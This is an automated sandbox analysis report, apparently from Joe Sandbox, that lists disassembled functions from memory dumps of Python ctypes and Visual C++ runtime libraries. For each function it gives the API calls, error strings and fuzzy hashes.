Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Free$String$Eval_Thread$BuildDeallocErr_ErrorFromInfoLocalObjectProgRestoreSaveValue
String ID: iu(uuuiu)
API String ID: 2817777535-1877708109
Opcode ID: f3fff332be11df24bb43f445367687364f99778bf223ac6a64006d9486d4d9c8
Instruction ID: e5a5e352ff9b104445d25ffd8b33c45753b9ac875991abfbec5e32158811428f
Opcode Fuzzy Hash: f3fff332be11df24bb43f445367687364f99778bf223ac6a64006d9486d4d9c8
Instruction Fuzzy Hash: 5A510466B05A469AEB10DFA9D4A43AD23B4FB89FC8F009536DE0E57B58DF38D508C350

Function 00007FF8B93C94A0 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 117COMMON

Download Yara Rule

APIs

PyIndex_Check.PYTHON311 ref: 00007FF8B93C94D4
PyNumber_AsSsize_t.PYTHON311 ref: 00007FF8B93C94EB
PyErr_Occurred.PYTHON311 ref: 00007FF8B93C94FA
PyErr_SetString.PYTHON311 ref: 00007FF8B93C9617

Strings

indices must be integer, xrefs: 00007FF8B93C9606
Array does not support item deletion, xrefs: 00007FF8B93C94C5
Can only assign sequence of same size, xrefs: 00007FF8B93C95A8

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Err_$CheckIndex_Number_OccurredSsize_tString
String ID: Array does not support item deletion$Can only assign sequence of same size$indices must be integer
API String ID: 428023279-3643249925
Opcode ID: 67ecbcca89311aff2d866ea192ce1f612227fb21c186869f9d79deb68ba184de
Instruction ID: 0b462fbc918acd3ae471b95c47e5213bcb1eb0ddf64ace2b571337aa1d8ea51b
Opcode Fuzzy Hash: 67ecbcca89311aff2d866ea192ce1f612227fb21c186869f9d79deb68ba184de
Instruction Fuzzy Hash: D9413D61A08FC681EE648F6AD8600BA2365FF4DFE4F056531EF1D47696DE3CE4498300

Function 00007FF8B93C40BC Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 108COMMON

Download Yara Rule

APIs

_PyObject_LookupAttrId.PYTHON311(00000000,00000000,00000001,00007FF8B93C373F), ref: 00007FF8B93C40E1
PySequence_Fast.PYTHON311 ref: 00007FF8B93C8B99
_Py_Dealloc.PYTHON311 ref: 00007FF8B93C8BAD
PyObject_GetAttr.PYTHON311 ref: 00007FF8B93C8BFA
_Py_Dealloc.PYTHON311 ref: 00007FF8B93C8C45
_Py_Dealloc.PYTHON311 ref: 00007FF8B93C8C5B
_Py_Dealloc.PYTHON311 ref: 00007FF8B93C8C6E

Strings

_anonymous_ must be a sequence, xrefs: 00007FF8B93C8B92
'%U' is specified in _anonymous_ but not in _fields_, xrefs: 00007FF8B93C8C81

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Dealloc$AttrObject_$FastLookupSequence_
String ID: '%U' is specified in _anonymous_ but not in _fields_$_anonymous_ must be a sequence
API String ID: 1391743325-2678605723
Opcode ID: 7250101b7d384b3603d10181ac32ac0acd4c5aaae793a49ebea8f6d5bde9a43b
Instruction ID: 9b4d95f3ed4f09b301ed5a4ac276811f21e63c7989b55d6a452da5ceacfa0545
Opcode Fuzzy Hash: 7250101b7d384b3603d10181ac32ac0acd4c5aaae793a49ebea8f6d5bde9a43b
Instruction Fuzzy Hash: 5D414B61A09F8695EA648F69D95427A63B4FF8ABD1F046031DB4E03250DF3CE4498300

Function 00007FF8B93C20E8 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 104COMMON

Download Yara Rule

APIs

PyObject_IsInstance.PYTHON311 ref: 00007FF8B93C2106
PyUnicode_AsUTF8.PYTHON311 ref: 00007FF8B93C212E

Part of subcall function 00007FF8B93C3DC0: _PyObject_New.PYTHON311(?,?,?,?,00007FF8B93C46A2,?,?,?,00007FF8B93C1959), ref: 00007FF8B93C3DCB

PyErr_Clear.PYTHON311 ref: 00007FF8B93C7143
_Py_Dealloc.PYTHON311 ref: 00007FF8B93C7152
_PyObject_LookupAttrId.PYTHON311 ref: 00007FF8B93C7167
_Py_CheckRecursiveCall.PYTHON311 ref: 00007FF8B93C71A3
_Py_Dealloc.PYTHON311 ref: 00007FF8B93C71BC
PyErr_SetString.PYTHON311 ref: 00007FF8B93C7215

Strings

abstract class, xrefs: 00007FF8B93C7137
while processing _as_parameter_, xrefs: 00007FF8B93C719C
wrong type, xrefs: 00007FF8B93C7204

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Object_$DeallocErr_$AttrCallCheckClearInstanceLookupRecursiveStringUnicode_
String ID: abstract class$while processing _as_parameter_$wrong type
API String ID: 4206935778-1173273510
Opcode ID: 961a10382abbd73e4d2a667dfe19ccb16767b9e8d8b3bad4ce0000eff4bf0ebe
Instruction ID: de06c3728f0b6c3e8a1b80b041e91e351e1c58ea5953a43b6740311ce5e70106
Opcode Fuzzy Hash: 961a10382abbd73e4d2a667dfe19ccb16767b9e8d8b3bad4ce0000eff4bf0ebe
Instruction Fuzzy Hash: 6F410926A09F8682EA649F6EE89417A2374EF8EFD1F156131DF0E47664DE2CE4498340

Function 00007FF8B93C2320 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

_PyDict_GetItemIdWithError.PYTHON311 ref: 00007FF8B93C2381
PyLong_AsUnsignedLongMask.PYTHON311 ref: 00007FF8B93C23A7
_PyDict_GetItemIdWithError.PYTHON311 ref: 00007FF8B93C23C1
PyErr_Occurred.PYTHON311 ref: 00007FF8B93C245D

Part of subcall function 00007FF8B93C4118: PySequence_Tuple.PYTHON311 ref: 00007FF8B93C4130
Part of subcall function 00007FF8B93C4118: PyTuple_New.PYTHON311 ref: 00007FF8B93C4157
Part of subcall function 00007FF8B93C4118: _PyObject_LookupAttrId.PYTHON311 ref: 00007FF8B93C418A

_PyDict_GetItemIdWithError.PYTHON311 ref: 00007FF8B93C23FF
_PyObject_LookupAttrId.PYTHON311 ref: 00007FF8B93C2446
PyCallable_Check.PYTHON311 ref: 00007FF8B93C7295
PyErr_Occurred.PYTHON311 ref: 00007FF8B93C72AC
PyErr_Occurred.PYTHON311 ref: 00007FF8B93C72C0
PyErr_SetString.PYTHON311 ref: 00007FF8B93C72E0

Strings

_restype_ must be a type, a callable, or None, xrefs: 00007FF8B93C72A3
class must define _flags_ which must be an integer, xrefs: 00007FF8B93C72CF

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Err_$Dict_ErrorItemOccurredWith$AttrLookupObject_$Callable_CheckLongLong_MaskSequence_StringTupleTuple_Unsigned
String ID: _restype_ must be a type, a callable, or None$class must define _flags_ which must be an integer
API String ID: 3087875697-2538317290
Opcode ID: c02ca58e13a46a6ce0520458656b58573f0571ee4510cffb2fc4fd828f69ccf3
Instruction ID: 5d86ffdbf66890c64991216b2910a170012a2bf7001c9c4fe809fafff0d27574
Opcode Fuzzy Hash: c02ca58e13a46a6ce0520458656b58573f0571ee4510cffb2fc4fd828f69ccf3
Instruction Fuzzy Hash: DA41E621A09B8692EA659F2DE99037A23B4FF4EBC4F446535DB4D462A4DF3CE468C310

Function 00007FF8B93CDEDC Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 76COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON311 ref: 00007FF8B93CDEF6
PyErr_SetString.PYTHON311 ref: 00007FF8B93CDF2A
PyErr_Format.PYTHON311 ref: 00007FF8B93CDF51
PyErr_Format.PYTHON311 ref: 00007FF8B93CDF70
PyMem_Calloc.PYTHON311 ref: 00007FF8B93CDF99
PyErr_NoMemory.PYTHON311 ref: 00007FF8B93CDFA7
memcpy.VCRUNTIME140 ref: 00007FF8B93CDFBF
PyMem_Realloc.PYTHON311 ref: 00007FF8B93CDFD2

Strings

On:resize, xrefs: 00007FF8B93CDEEA
excepted ctypes instance, xrefs: 00007FF8B93CDF20
minimum size is %zd, xrefs: 00007FF8B93CDF47
Memory cannot be resized because this object doesn't own it, xrefs: 00007FF8B93CDF66

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Err_$FormatMem_$Arg_CallocMemoryParseReallocStringTuplememcpy
String ID: Memory cannot be resized because this object doesn't own it$On:resize$excepted ctypes instance$minimum size is %zd
API String ID: 2473355626-828838525
Opcode ID: f25097e4f29e0a836fc8ce735c340e9b52c9a2e89e2e7b96c33704ef34719194
Instruction ID: 653623fa8563fa201c6f2c355e5f8eb74b1d6cb1044869d8c61442f6feae3973
Opcode Fuzzy Hash: f25097e4f29e0a836fc8ce735c340e9b52c9a2e89e2e7b96c33704ef34719194
Instruction Fuzzy Hash: 7531F861A09F8681EA649F59E46417A6374FF8DFC4F102036EB1E47764DF2CE898C750

Function 00007FF8B9F6AC40 Relevance: 19.9, APIs: 13, Instructions: 361COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FF8B9F6AC91
DName::operator+.LIBVCRUNTIME ref: 00007FF8B9F6AD5A
DName::operator+.LIBVCRUNTIME ref: 00007FF8B9F6ADA3
DName::operator+.LIBVCRUNTIME ref: 00007FF8B9F6ADB4

Memory Dump Source

Source File: 00000007.00000002.2088453756.00007FF8B9F61000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9F60000, based on PE: true

Associated: 00000007.00000002.2088414184.00007FF8B9F60000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088510059.00007FF8B9F71000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088589734.00007FF8B9F76000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088624293.00007FF8B9F77000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b9f60000_lib.jbxd

Similarity

API ID: Name::operator+
String ID:
API String ID: 2943138195-0
Opcode ID: b0c5aa40c95afe9820d08c2b3a0b3f0a0bd29e174dcc6565612d28bd398cd5cc
Instruction ID: 95eae4097c7a3a8e6915162b8b760d507522dabc5293a64cb418a58acf7abcb9
Opcode Fuzzy Hash: b0c5aa40c95afe9820d08c2b3a0b3f0a0bd29e174dcc6565612d28bd398cd5cc
Instruction Fuzzy Hash: DBF14A76A08B869AEB10DFA8D4901EC3BB1EB0479DB405036EB4D57B9ADF38D959C340

Function 00007FF8B93C28F0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 197COMMON

Download Yara Rule

APIs

PyTuple_New.PYTHON311 ref: 00007FF8B93C76A3
PyLong_AsUnsignedLongMask.PYTHON311 ref: 00007FF8B93C7709

Strings

NULL stgdict unexpected, xrefs: 00007FF8B93C789E
paramflag %u not yet implemented, xrefs: 00007FF8B93C7861
%s 'out' parameter must be passed as default value, xrefs: 00007FF8B93C7881
call takes exactly %d arguments (%zd given), xrefs: 00007FF8B93C78DF

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: LongLong_MaskTuple_Unsigned
String ID: %s 'out' parameter must be passed as default value$NULL stgdict unexpected$call takes exactly %d arguments (%zd given)$paramflag %u not yet implemented
API String ID: 1136903700-2588965191
Opcode ID: 91dd6e13f2742febeda4ec11071149d11ba9fea3fb7657fd2f121691aebacfe3
Instruction ID: e02758c9e0de55fc25870825e622037480f18ba3b9eac791d30e6a78f664fc67
Opcode Fuzzy Hash: 91dd6e13f2742febeda4ec11071149d11ba9fea3fb7657fd2f121691aebacfe3
Instruction Fuzzy Hash: 11813876A09B8686EAA08F1AE45467A67B4FB89BC4F516036DF4E43764DF3CE448C700

Function 00007FF8B93CAA7C Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 165COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON311(?,?,?,?,00007FF8B93C947D,?), ref: 00007FF8B93CAABD

Strings

expected %s instance, got %s, xrefs: 00007FF8B93CABDE
(%s) , xrefs: 00007FF8B93CAB4E
not a ctype instance, xrefs: 00007FF8B93CAAB3
incompatible types, %s instance instead of %s instance, xrefs: 00007FF8B93CACE1

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Err_String
String ID: (%s) $expected %s instance, got %s$incompatible types, %s instance instead of %s instance$not a ctype instance
API String ID: 1450464846-2159251832
Opcode ID: 07203d23819d05828f358a56c03890258eda92ffb1c002cf2859f9f66371a8e9
Instruction ID: 08d160f93dd6549c91826b7d232e3582f2e055b38ad996fa15464126c03d5ae0
Opcode Fuzzy Hash: 07203d23819d05828f358a56c03890258eda92ffb1c002cf2859f9f66371a8e9
Instruction Fuzzy Hash: 7E712C65A0CF8682EA149F1AE9641BA63B5EF8DFC4F456032DF4D877A5DF2CE4488340

Function 00007FF8B93CAEA0 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 145COMMON

Download Yara Rule

APIs

_PyArg_ParseTuple_SizeT.PYTHON311 ref: 00007FF8B93CAF08
PyErr_SetString.PYTHON311 ref: 00007FF8B93CAF46
_PyArg_ParseTuple_SizeT.PYTHON311 ref: 00007FF8B93CAFE9
PyErr_Format.PYTHON311 ref: 00007FF8B93CB04C

Strings

abstract class, xrefs: 00007FF8B93CAF35
paramflags must be a sequence of (int [,string [,value]]) tuples, xrefs: 00007FF8B93CB0D7
i|OO, xrefs: 00007FF8B93CAFE2
paramflags must have the same length as argtypes, xrefs: 00007FF8B93CAFAD
paramflag value %d not supported, xrefs: 00007FF8B93CB03E
is|Oz#, xrefs: 00007FF8B93CAEE3
paramflags must be a tuple or None, xrefs: 00007FF8B93CB0E3

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Arg_Err_ParseSizeTuple_$FormatString
String ID: abstract class$is|Oz#$i|OO$paramflag value %d not supported$paramflags must be a sequence of (int [,string [,value]]) tuples$paramflags must be a tuple or None$paramflags must have the same length as argtypes
API String ID: 2189051491-1121734848
Opcode ID: 3d6b330cc5c9dd7f19e068a29130591e5b204b1fdfc58b1c50816dd1f366be30
Instruction ID: 1545c37041c94c197b9727299fccc0b5ca7fc3d7833b9e1967dba610d084943b
Opcode Fuzzy Hash: 3d6b330cc5c9dd7f19e068a29130591e5b204b1fdfc58b1c50816dd1f366be30
Instruction Fuzzy Hash: FB614A72A09B9285EB54CF6AE8902AA23B4FB49BC4F156036DF0D57B54DF3DE489C300

Function 00007FF8B9F62F14 Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 314COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FF8B9F62F71

Part of subcall function 00007FF8B9F652D0: __GetUnwindTryBlock.LIBCMT ref: 00007FF8B9F65313
Part of subcall function 00007FF8B9F652D0: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FF8B9F65338

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF8B9F63049
terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8B9F63056
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FF8B9F632A0
terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8B9F632CE

Part of subcall function 00007FF8B9F669C0: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF8B9F625CE), ref: 00007FF8B9F669CE

abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8B9F63394
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF8B9F633C9

Strings

csm, xrefs: 00007FF8B9F62FF2
csm, xrefs: 00007FF8B9F6306E
csm, xrefs: 00007FF8B9F62F8B

Memory Dump Source

Source File: 00000007.00000002.2088453756.00007FF8B9F61000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9F60000, based on PE: true

Associated: 00000007.00000002.2088414184.00007FF8B9F60000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088510059.00007FF8B9F71000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088589734.00007FF8B9F76000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088624293.00007FF8B9F77000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b9f60000_lib.jbxd

Similarity

API ID: BlockFrameHandler3::Unwindabortterminate$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 4223619315-393685449
Opcode ID: 1fea5c564d133bdba3aecb898f1e2b7bc476544beebca211cb7a23793dbe9004
Instruction ID: 7fcc8160e205bee8418fbe74d9ca2fee7bb2a8b4c1a1aa7fc7761a4302bf1706
Opcode Fuzzy Hash: 1fea5c564d133bdba3aecb898f1e2b7bc476544beebca211cb7a23793dbe9004
Instruction Fuzzy Hash: 81E1B272A08B8286EB20CF69D4412AD77A0FB45BE9F102139DF8D57B99CF78E184C700

Function 00007FF8B93C2980 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FF8B93C2A27
PyObject_CallOneArg.PYTHON311 ref: 00007FF8B93C2A7E
_Py_Dealloc.PYTHON311 ref: 00007FF8B93C2C36
PyErr_Format.PYTHON311 ref: 00007FF8B93C793D

Strings

too many arguments (%zi), maximum is %i, xrefs: 00007FF8B93C792D
argument %zd: , xrefs: 00007FF8B93C798B

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: CallDeallocErr_FormatObject_memset
String ID: argument %zd: $too many arguments (%zi), maximum is %i
API String ID: 1791410686-4072972272
Opcode ID: 4740f729d07df1b72c89f8ee573bc102a3c799c06bb822e8bf3e008f4163d2c1
Instruction ID: 729155cb1441948f7c6c775af27a4ce973a449c6bd50ad49883b002977f1c46f
Opcode Fuzzy Hash: 4740f729d07df1b72c89f8ee573bc102a3c799c06bb822e8bf3e008f4163d2c1
Instruction Fuzzy Hash: D4B16066A08FC285EB609F2D88902BA2375FF09BE8F146631DF5D477D5DE38E5498300

Function 00007FF8B9F6E72C Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 192COMMONLIBRARYCODE

Download Yara Rule

APIs

Replicator::operator[].LIBVCRUNTIME ref: 00007FF8B9F6E786

Strings

`template-parameter-, xrefs: 00007FF8B9F6E81B
`generic-type-, xrefs: 00007FF8B9F6E862
template-parameter-, xrefs: 00007FF8B9F6E7E8
generic-type-, xrefs: 00007FF8B9F6E82F

Memory Dump Source

Source File: 00000007.00000002.2088453756.00007FF8B9F61000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9F60000, based on PE: true

Associated: 00000007.00000002.2088414184.00007FF8B9F60000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088510059.00007FF8B9F71000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088589734.00007FF8B9F76000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088624293.00007FF8B9F77000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b9f60000_lib.jbxd

Similarity

API ID: Replicator::operator[]
String ID: `generic-type-$`template-parameter-$generic-type-$template-parameter-
API String ID: 3676697650-3207858774
Opcode ID: ecd4a8ae6d7230611fff1dd4e64a59f99909a897cce7822f33257ee1ddf9a1a8
Instruction ID: 1c71c55eac6a6932c246ff43a01f25f100ce093dfb0739500b1bac3d0de4be73
Opcode Fuzzy Hash: ecd4a8ae6d7230611fff1dd4e64a59f99909a897cce7822f33257ee1ddf9a1a8
Instruction Fuzzy Hash: 77918C22A08BCA89FB508F28D4402BC3BA2AF557AAF586132DB5D077A5DF3CE555C350

Function 00007FF8B93CAD18 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 62COMMON

Download Yara Rule

APIs

_PyArg_ParseTuple_SizeT.PYTHON311 ref: 00007FF8B93CAD4F
memcpy.VCRUNTIME140 ref: 00007FF8B93CAD75
PyObject_GetAttrString.PYTHON311 ref: 00007FF8B93CAD84
PyErr_Format.PYTHON311 ref: 00007FF8B93CADC0
_Py_Dealloc.PYTHON311 ref: 00007FF8B93CADCF
PyDict_Update.PYTHON311 ref: 00007FF8B93CADEA
_Py_Dealloc.PYTHON311 ref: 00007FF8B93CADFB

Strings

%.200s.__dict__ must be a dictionary, not %.200s, xrefs: 00007FF8B93CADA7
__dict__, xrefs: 00007FF8B93CAD7A
O!s#, xrefs: 00007FF8B93CAD3D

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Dealloc$Arg_AttrDict_Err_FormatObject_ParseSizeStringTuple_Updatememcpy
String ID: %.200s.__dict__ must be a dictionary, not %.200s$O!s#$__dict__
API String ID: 111561578-4068157617
Opcode ID: df2c1ae6872be876c0abca8e9306c520b908d31e559ab2d333eeb8cb4e17a471
Instruction ID: cf37a6b75057a5ce6e4d8127eace0c8730e1c7dd2351483689d24bbfde4f2b4d
Opcode Fuzzy Hash: df2c1ae6872be876c0abca8e9306c520b908d31e559ab2d333eeb8cb4e17a471
Instruction Fuzzy Hash: EA314972A08B8682EB508F69E8640B923B4FF8AFE5F556132DB1D43754CF3CE4988300

Function 00007FF8B90611D0 Relevance: 16.7, APIs: 11, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF8B90611F8
__scrt_initialize_crt.LIBCMT ref: 00007FF8B906123D
__scrt_acquire_startup_lock.LIBCMT ref: 00007FF8B906124A
_RTC_Initialize.LIBCMT ref: 00007FF8B9061278
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00007FF8B906129E
__scrt_release_startup_lock.LIBCMT ref: 00007FF8B90612C9

Memory Dump Source

Source File: 00000007.00000002.2087887642.00007FF8B9061000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF8B9060000, based on PE: true

Associated: 00000007.00000002.2087851325.00007FF8B9060000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000007.00000002.2087957246.00007FF8B9063000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000007.00000002.2087988693.00007FF8B9065000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000007.00000002.2088065900.00007FF8B9066000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b9060000_lib.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
String ID:
API String ID: 349153199-0
Opcode ID: 49741281be2100ec61cea02429068dcdc2aa4a812f9568a561c19d79723e8765
Instruction ID: 89e6d9307b5693bdf887aacd5c2f0a89976c2fedc83666baddcdd3d0fdca4f69
